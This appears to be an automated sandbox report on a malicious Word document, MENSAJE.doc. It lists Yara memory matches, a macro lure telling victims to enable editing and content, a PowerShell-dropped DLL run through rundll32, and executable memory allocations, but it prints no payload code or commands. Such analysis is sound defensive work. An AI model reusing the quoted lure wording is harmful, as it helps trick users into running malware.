Source: Yara match	File source: 0000000C.00000002.2152580168.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2338110050.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2173536916.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2129792071.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2129775635.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2188065984.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2121402086.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2336299339.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2130727723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2144677498.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2145636371.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2205471749.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2144648920.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2198917557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2186005336.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2163840941.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2195824360.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2097343885.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2206163057.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2110270893.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 5,956 N@m 13 ;a 1009
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G)
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G) A GE)
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Liq8l58\Egok7ei\D64O.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5641
Source: unknown	Process created: Commandline size = 5540
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5540	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Sqnknlpyv\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017D7D	7_2_10017D7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100189F6	7_2_100189F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007605	7_2_10007605
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000620A	7_2_1000620A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001F411	7_2_1001F411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F813	7_2_1000F813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D013	7_2_1000D013
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008816	7_2_10008816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000421E	7_2_1000421E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C424	7_2_1001C424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002628	7_2_10002628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004A2B	7_2_10004A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000DC2F	7_2_1000DC2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018831	7_2_10018831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007E34	7_2_10007E34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A83A	7_2_1000A83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000903F	7_2_1000903F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014E4B	7_2_10014E4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000704B	7_2_1000704B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D44C	7_2_1000D44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C04C	7_2_1001C04C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005856	7_2_10005856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001658	7_2_10001658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011259	7_2_10011259
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018668	7_2_10018668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C07D	7_2_1000C07D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014693	7_2_10014693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CAA0	7_2_1001CAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004EA1	7_2_10004EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008CA3	7_2_10008CA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C6AD	7_2_1001C6AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100056B3	7_2_100056B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015AB8	7_2_10015AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005EB9	7_2_10005EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100106C2	7_2_100106C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009CC8	7_2_10009CC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D2CB	7_2_1001D2CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D0DE	7_2_1000D0DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009AE1	7_2_10009AE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100142E2	7_2_100142E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DEE8	7_2_1001DEE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100094EC	7_2_100094EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C6EF	7_2_1000C6EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CF11	7_2_1000CF11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015115	7_2_10015115
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001231B	7_2_1001231B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BF25	7_2_1001BF25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DB25	7_2_1001DB25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000492A	7_2_1000492A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D530	7_2_1001D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000213E	7_2_1000213E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CB42	7_2_1000CB42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10016B45	7_2_10016B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001654F	7_2_1001654F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003D4E	7_2_10003D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10018F65	7_2_10018F65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012965	7_2_10012965
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001676B	7_2_1001676B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010F6D	7_2_10010F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011B71	7_2_10011B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017570	7_2_10017570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A176	7_2_1000A176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DD78	7_2_1001DD78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10013D7C	7_2_10013D7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E19F	7_2_1001E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100199A4	7_2_100199A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015DAA	7_2_10015DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001EDB9	7_2_1001EDB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006BC0	7_2_10006BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100173C0	7_2_100173C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100177C0	7_2_100177C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019DC0	7_2_10019DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100193C9	7_2_100193C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CDCC	7_2_1001CDCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000ADCE	7_2_1000ADCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B1D2	7_2_1001B1D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004BDE	7_2_10004BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005BE1	7_2_10005BE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002DEE	7_2_10002DEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100137F4	7_2_100137F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B3FE	7_2_1001B3FE

Source: MENSAJE.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Nre_13r__v1meabhr2, Function Document_open			Name: Document_open

Source: MENSAJE.doc

OLE indicator, VBA macros: true

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@32/8@1/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ENSAJE.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBDB3.tmp

Jump to behavior

Source: MENSAJE.doc

OLE indicator, Word Document stream: true

Source: MENSAJE.doc	OLE document summary: title field not present or empty
Source: MENSAJE.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............O........................... .0.......0.............P.......................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............O...l...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........Y.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................9..j......................u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................9..j..... u...............u.............}..v............0.N...............Y.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................u.............}..v....@.......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......Y...............u.............}..v............0.N.............(.Y.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............i..j......................u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............i..j..... u...............u.............}..v............0.N.............x.Y.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7................3.j.....LY...............u.............}..v....p.......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7................2.j....(.................u.............}..v............0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C................3.j.....LY...............u.............}..v....p.......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C................2.j....(.................u.............}..v............0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O................3.j.....LY...............u.............}..v....p.......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O................2.j....(.................u.............}..v............0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.N.............HIY.....(.......l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[................2.j....x.................u.............}..v............0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.2.............}..v............0.N.............HIY.....$.......l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....%......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....%................u.............}..v....@&......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....-......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....-................u.............}..v....@.......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....5......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....5................u.............}..v....@6......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....=......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....=................u.............}..v....@>......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....E......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....E................u.............}..v....@F......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....M......0.N.............................l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................2.j.....M................u.............}..v....@N......0.N..............IY.............l...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j.....LY...............u.............}..v.....U......0.N.............................l...............	Jump to behavior
